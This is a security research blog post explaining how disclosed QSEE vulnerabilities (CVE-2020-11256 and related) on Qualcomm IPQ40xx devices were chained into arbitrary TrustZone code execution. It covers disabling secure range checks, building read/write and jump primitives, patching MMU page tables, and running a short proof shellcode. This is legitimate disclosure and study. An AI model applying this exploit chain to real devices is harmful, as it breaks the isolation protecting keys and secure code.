Qualcomm IPQ40xx: Achieving QSEE Code Execution

Monday, Jun 14, 2021

In this post we finally dive into our approach for exploiting the vulnerabilities we’ve identified in QSEE, Qualcomm’s Trusted Execution Environment (TEE), on Qualcomm IPQ40xx-based devices (see post #1 and post #2). This allowed us to achieve arbitrary code execution in the context of QSEE.

Interestingly, the exploitation approach described in this post can also be used for the with the Electromagnetic Fault Injection (EMFI) attack we performed as well (see post #3). This allows achieving code execution in absence of any software vulnerability.

Secure ranges

It’s the responsibility of QSEE to check that input/output buffers passed by the REE do not overlap with secure memory. As we described in post #2, this is done using secure range checks.

The secure range table and its entries may vary between devices, as it depends on the memory layout of the device. The secure range table for our target is shown below. It contains 10 entries of which three are configured and enabled.

                   ID        FLAGS        START        END    
LOAD:87EAB1E0 <0x00000000, 0x00000002, 0x00000000, 0x7FFFFFFF>
LOAD:87EAB1F0 <0x00000001, 0x00000002, 0x90000000, 0xFFFFFFFF>
LOAD:87EAB200 <0x00000002, 0x00000002, 0x87E80000, 0x87FFFFFF>
LOAD:87EAB210 <0x00000003, 0x00000001, 0x00000000, 0x00000000>
LOAD:87EAB220 <0x00000004, 0x00000001, 0x00000000, 0x00000000>
LOAD:87EAB230 <0x00000005, 0x00000001, 0x00000000, 0x00000000>
LOAD:87EAB240 <0x00000006, 0x00000001, 0x00000000, 0x00000000>
LOAD:87EAB250 <0x00000007, 0x00000001, 0x00000000, 0x00000000>
LOAD:87EAB260 <0x00000008, 0x00000001, 0x00000000, 0x00000000>
LOAD:87EAB270 <0x00000009, 0x00000001, 0x00000000, 0x00000000>
LOAD:87EAB280 <0xFFFFFFFF, 0x00000000, 0x00000000, 0x00000000>

The entire address space is covered (32-bit) by the secure ranges. With the above configuration, only the following non-secure memory ranges defined: 0x80000000 - 0x87E80000 and 0x88000000 - 0x90000000. The rest is considered secure memory by the secure range check.

Other (hardware) TrustZone controllers (i.e. TZASC) ensure that the REE cannot access secure memory directly over the bus. The configuration of these controllers must be fully aligned with the defined secure ranges. Any discrepancy may allow the REE to access secure memory.

Open Sesame

The vulnerable SMC handler routines we identified were using the secure range check incorrectly (see post #2). This allows writing several restricted values values (i.e. 0, 1 and 2) to an arbitrary address (incl. secure memory). While these are interesting primitives, they are not sufficient to achieve arbitrary code execution directly.

We raelized that the unused secure range entries have the FLAGS field set to 0x00000001. Interestingly, this field is checked by the secure range check function (i.e. is_allowed_range). If bit 1 is set to 0, the entry is actually skipped as is visible in the decompiled code shown below.

style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">

int is_allowed_range(uint32_t *sr_table, uint32_t *start_addr, uint32_t *end_addr) { uint32_t *range_addr, range_start; secure_range *sec_range;

if ( end_addr < start_addr ) return 0;

for ( int i = 0; ; ++i )                // iterate over all entries style="color:#75715e">    { sec_range = &sr_table[4 * i];       // get pointer to entry style="color:#75715e">        if ( sec_range->id == 0xFFFFFFFF ) break; if ( !(sec_range->flags & 2) )      // check if range is enabled style="color:#75715e">            continue;                       // go to next entry style="color:#75715e"> range_addr = sec_range->end_addr; if ( !range_addr ) { range_addr = sec_range->start_addr; if ( range_addr <= start_addr ) return 0; LABEL_10: if ( range_addr <= end_addr ) return 0;

continue; } // check range style="color:#75715e">        range_start = sec_range->start_addr; if ( range_start <= start_addr && range_addr > start_addr || range_start <= end_addr && range_addr > end_addr ) return 0;

if ( range_start > start_addr ) goto LABEL_10; } return 1;                               // range is allowed style="color:#75715e">}
This means we are able to disable an entry in the secure range table if we are able to set bit 1 of the flags field. As you likely raelize, we can use the restricted writes (i.e. CVE-2020-11256, CVE-2020-11258 and CVE-2020-11259) for doing exactly that. For example, we can write 0x1 to the flags field of all the entries as is shown below.

...
LOAD:87EAB1E0 <0x00000000, 0x00000001, 0x00000000, 0x7FFFFFFF>
LOAD:87EAB1F0 <0x00000001, 0x00000001, 0x90000000, 0xFFFFFFFF>
LOAD:87EAB200 <0x00000002, 0x00000001, 0x87E80000, 0x87FFFFFF>
...

Once all secure ranges are disabled, the secure range checks performed by all the SMC handler routines will consider any physical address (incl. secure memory) to be allowed. This opens up a completely new attack surface as the behavior of the other SMC handlers can now be used for our own advantage.
Differently said, by removing the restrictions enforced by the secure range checks, we made all SMC handler routines vulnerable in a very similar fashion as the software vulnerabilities we identified.
Findings new primitives

After removing the restrictions enforced by the secure range checks, we were presented with a variety of possibilities. We immediately started foraging for more powerful Read, Write and Execution primitives. Better primitives should bring us closer to achieving arbitrary QSEE code execution.
Write primitive
The SMC handler routine tzbsp_pil_get_mem_area calls the get_mem_area function with arg2 as is shown below.
int tzbsp_pil_get_mem_area(int arg1, uint32_t *arg2, uint32_t arg3)
{
    if ( arg3 < 8 )
        return 0xFFFFFFF0;
    
    // this secure range check is disabled
    if ( is_non_sec_mem(arg2, 8) )
        return get_mem_area(arg2, arg2 + 1);

    return 0xFFFFFFEE;
}
The get_mem_area writes 0x80000000 and 0xA0000000 to an address provided by the REE by dereferencing the pointer contained in arg2.
int get_mem_area(uint32_t *a1, uint32_t *a2) 
{
  *a1 = 0x80000000;
  *a2 = 0xA0000000;
  return 0;
}
The is_non_sec_mem function returns always 1 as all secure ranges are disabled. Therefore, we can write 0x80000000 and 0xA0000000 to any address (incl. secure memory). This adds two more restricted writes collection of restricted writes.
Read/Write primitive
The SMC handler routine tzbsp_get_diag copies the diagnostics information buffer to an address that’s provided by the REE. The source address (i.e. 0x87FDF000), which we named diag_info_buf_ptr, is actually a pointer stored in a writable location in secure memory.
int tzbsp_get_diag(uint8_t *addr, size_t size)
{
    if ( size < 0x1000 )
        return 0xFFFFFFEF;

    // this secure range check is disabled
    if ( addr > ~size || !is_allowed_range(sr_table, addr, &addr[size - 1]) )
        return 0xFFFFFFEE;
    
    // copy from diag_info_buf_ptr to dst_addr
    memcpy(addr, diag_info_buf_ptr, 0x1000u);
    tzbsp_dcache_clean_inval_region(addr, 0x1000);
    return 0;
}
We can write the contents of the diagnostics information buffer to any address as we control addr and the secure ranges are disabled.
We can use the previously described Write primitive to overwrite diag_info_buf_ptr with 0x80000000. As this address points to non-secure memory, we control the data stored at this address. This allows us to write arbitrary data to an arbitrary address.
Then, we can use this arbitrary Write primitive to overwrite diag_info_buf_ptr with an arbitrary value. This allows us to write read from an arbitrary address.
The downside of this Read/Write primitive is that it always copies 0x1000 bytes. Another inconvenience is that we cannot read the initial value of (diag_info_buf_ptr) as arbitrary reads are only possible after the Write primitive is obtained. This means we cannot restore the original value if needed.
Execution primitive
The SMC handler routine tzbsp_exec_smc calls the function exec_smc_wrapper with arguments passed by the REE as is shown below.
int tzbsp_exec_smc(unsigned int addr1, unsigned int addr2, int size2)
{
    if ( addr2 >= addr1 )
    {
        exec_smc_wrapper(addr1, addr2 - addr1 - 0xC, addr2, size2);
        JUMPOUT(locret_87E88636);
    }
    return 0xFFFFFFF0;
The exec_smc_wrapper function calls exec_smc with the arguments received from the REE. Note, not all arguments are fully under REE control as size1 is computed (i.e. addr2 - addr1 - 0xC).
int exec_smc_wrapper(int addr1, int size1, int addr2, int size2)
{
  return exec_smc(addr1, size1, addr2, size2, 0);
}
The exec_smc function performs two checks on the arguments passed by the REE using the is_non_sec_mem. Then, once all checks are passed, it retrieves a function pointer from a table in memory (smc_exec_func_ptr_tbl) and calls it with the arguments passed by the REE.
int exec_smc(int addr1, int size1, int addr2, int size2, int idx)
{
    void (__fastcall *smc_func_ptr)(int, int, int, int);

    // these secure range checks are disabled
    if ( !is_non_sec_mem(addr1, size1) || !is_non_sec_mem(addr2, size2) )
        return 0xFFFFFFEE;

    // retrieve function pointer from secure
    smc_func_ptr = smc_exec_func_ptr_tbl[5 * idx];

    // if function pointer is not zero, call the function pointer
    if ( smc_func_ptr )
        smc_func_ptr(addr1, size1, addr2, size2);
    
    return 0;
}
The function pointer is stored in a writable location in secure memory and therefore we can overwrite it with an arbitrary value using our Read/Write primitive. This allows us to make the processor execute code from any address.
Returning-to-QSEE

We have many ingredients, we can read from anywhere, we can write to anywhere and we can make the processor jump to any location, let’s start cooking. As a first step, we’ve decided to use our newly acquired primitives to return to the QSEE software itself.
Jumping anywhere
Our goal is to overwrite the function pointer used by tzbsp_exec_smc with an arbitrary value. We accomplished this by combining multiple primitives together.

Call tzbsp_pil_get_memory_area to overwrite tzbsp_get_diag’s source address with 0x80000000 which is non-secure memory.
Copy our target pointer to be executed to address 0x80000000 from the REE.
Call tzbsp_get_diag to overwrite tzbsp_exec_smc’s function pointer table with the target pointer.
Call tzbsp_exec_smc to jump to any address within the QSEE software.

Whoop Whoop! Well, let’s not celebrate too soon. We can only reuse QSEE code that’s already present inside the device. We can call e.g. specific functions or gadgets. Quite interesting, but not exactly arbitrary code execution.
Improved Read/Write primitive
Nonetheless, let’s use it for something useful. The Read/Write primitive described earlier in this post is not optimal as it always copies 0x1000 bytes and its source pointer must be adjusted constantly. Therefore, we decided to use our newly acquired return-to-QSEE capabilities to create a RW-primitive that we fully control.
We identified the presence of a hardened memcpy implementation which we named secure_memcpy. As is common practice, it’s actually a wrapper around an actual memcpy function as is shown below.
uint32_t secure_memcpy(int dst, uint32_t dst_size, int src, uint32_t src_size)
{
  if ( dst_size > src_size )
    dst_size = src_size;
  else
    dst_size = dst_size;
  
  memcpy(dst, src, dst_size);
  return dst_size;
}
Why is this useful? Well, we can use our return-to-QSEE capabilities to call any function, including the secure_memcpy function. Ideally, we would call the memcpy function directly, but we do not control all arguments. We actually only control r0, r2 and r3. Luckily, the secure_memcpy function uses exactly these arguments as arguments for calling the memcpy function. This allows us to leverage the secure_memcpy function to call the memcpy function with arbitrary arguments in order to create a very efficient Read/Write primitive.
Executing shellcode

The classical approach would be to write a shellcode in QSEE memory ensure the memory is also executable and then trigger execution. But we actually prefer a slightly more effective approach that practically works in many real cases: store the shellcode in non-secure memory, that we already control and have QSEE execute it from there. This allows very easy shaping of our payloads.
We tried this strategy, but we quickly figured out that something prevented our shellcode from executing. The MMU is actually correctly configured to prevent the processor to execute from non-secure pages when it’s in the secure state (i.e. the XN-bit is correctly used). Therefore, we needed to circumvent the limitations of the MMU in to order achieve arbitrary code execution.
Patching the MMU configuration
The Translation Table Base Register 0, TTBR0 register, stores the base address for the L1 translation table. The size of this primary page table is 16 KB and its base is set to 0x87EDC000 for the device we are analyzing. We’ve recovered this address by reverse engineering the QSEE initialization routines.
...                                                   
LOAD:87E8B520 90 00 9F E5   LDR    R0, =dword_87EDC000
LOAD:87E8B524 D9 E2 FF EB   BL     set_TTBR0
...                                                   
We used our arbitrary Read/Write primitive to dump the entire L1 translation table. This table includes 4096 entries of 4 bytes that describe the entire 32-bit virtual address space in 1 MB chunks. Each entry can be set as Invalid, Page table, Section, Supersection or Reserved.
For the device we analyzed, the L1 translation table only included Section and Page table entries. A Section entry covers an entire 1 MB region. A Page table entry points to a L2 translation table that includes 256 entries to cover the 1 MB region in 4 KB chunks. The entire virtual address spaces is mapped to the physical address space using a 1-to-1 mapping. Several entries are shown in the snippet below.

...                                                            
0x87edc000:     01 a0 eb 87 01 a4 eb 87 16 04 21 00 16 04 31 00
0x87edc010:     16 04 41 00 16 04 51 00 16 04 61 00 16 04 71 00
...                                                            
0x87edffe0      16 04 81 ff 16 04 91 ff 16 04 a1 ff 16 04 b1 ff
0x87edfff0      16 04 c1 ff 16 04 d1 ff 16 04 e1 ff 16 04 f1 ff
...                                                            

As the page tables are not easily digested by the human brain, we wrote a translation table parser in order to make sense out of the MMU configuration. The non-secure memory is configured using Section entries in the L1 page table for which the format is shown in the picture below.

    
        
    

A representation of the Section entry for address 0x82000000 (i.e. non-secure memory) obtained from our parser is shown below. It shows the 1-to-1 mapping and the configuration bits that are set for that 1 MB chunk of memory.

VA[0x82000000] --> PA[0x82000000] Domain: 0 NS: 0 AP: 001 XN: 1 PXN: 0

The XN-bit (i.e. bit 4) is set to 1, which means an exception will be raised by the MMU if the processor tries to execute from that chunk of memory. The entire non-secure memory range has the XN-bit set in QSEE MMU configuration. This is THE reason we cannot execute from non-secure memory.
We decided to set the XN-bit to 0 in the Section entry of the L1 translation table for address 0x82000000 using our arbitrary Read/Write primitive. This allows us to store a shellcode in non-secure memory and execute it with QSEE privileges using our execution primitive.

Old: VA[0x82000000]: Section ----> PA[0x82000000] Domain: 0 NS: 0 AP: 001 XN: 1 PXN: 0
New: VA[0x82000000]: Section ----> PA[0x82000000] Domain: 0 NS: 0 AP: 001 XN: 0 PXN: 0

Executing the shellcode
The shellcode, we store at address 0x82000000 (non-secure memory), reads the Secure Configuration Register (SCR), which contains the NS-bit. If the read-out NS-bit is set to 0 code execution is being performed with QSEE privileges. This allows us to determine if the exploit works as expected.
0x00:  11 1F 11 EE    mrc p15, #0, r1, c1, c1, #0   // read SCR into R1
0x04:  00 10 80 E5    str r1, [r0]                  // store R1 at [R0]
0x08:  1E FF 2F E1    bx  lr                        // return
We take the following steps to execute the shellcode:

Store shellcode at 0x82000000 in non-secure memory
Disable the secure ranges using CVE-2020-11256
Create our Read/Write primitive using the secure_memcpy function
Use this primitive to patch the L1 translation table entry for 0x82000000
Jump to 0x82000000 using our execution primitive to achieve arbitrary code execution

The video below demonstrates the complete exploit.





Note, disabling the secure ranges can also be accomplished using the hardware EMFI attack that we described in post #3. This shows that software exploitation knowledge can be reused efficiently for fault injection attacks. Differently said, exploits made for software vulnerabilities that are already fixed can be reused.
Conclusion

The vulnerabilities we identified in QSEE allowed us to write several restricted values to secure memory. This enabled us to disable the secure range checks in order to open up a larger attack surface that we used to achieve arbitrary code execution.
This reminds us of an old adage that any secure system is really only as strong as its weakest link. If the software is vulnerable, the ARM TrustZone hardware primitives provide little protection. Moreover, the enforcement of the security boundary between the REE and QSEE is for a significant part implemented in software.
It’s worth noting that the use of secure range checks is not uncommon. Actually, any privileged subsystem receiving arguments (i.e. pointers) from a non-trusted subsystem must implement some form of sanitation in line with the current secure memory layout. Therefore, the exploitation strategy that we used may be applicable to other TEEs as well.
The ability to reconfigure the QSEE subsystem provides ample opportunities to an attacker. As demonstrated in this research, a restricted write due to a software vulnerability may compromise the entire QSEE subsystem.
Locking the configuration until next reset would obviously address this issue. However, this is only possible for long-lived configuration options that do not need any changes at runtime. For example, most devices dynamically reuse memory as secure and non-secure for implementing various use cases efficiently. Therefore, several configurations can simply not be fully locked.
Interesting solutions include verifying the integrity of the configured secure range tables. For our approach, a simple checksum would have likely been sufficient to prevent the modification of the secure range table, as we only had the ability to write restricted values.
Final words

This post concludes our research on QSEE, Qualcomm’s Trusted Execution Environment (TEE), on Qualcomm IPQ40xx-based devices. We like to thank Qualcomm for professionally handling the disclosure and their attitude towards us as security researchers.
- Raelize.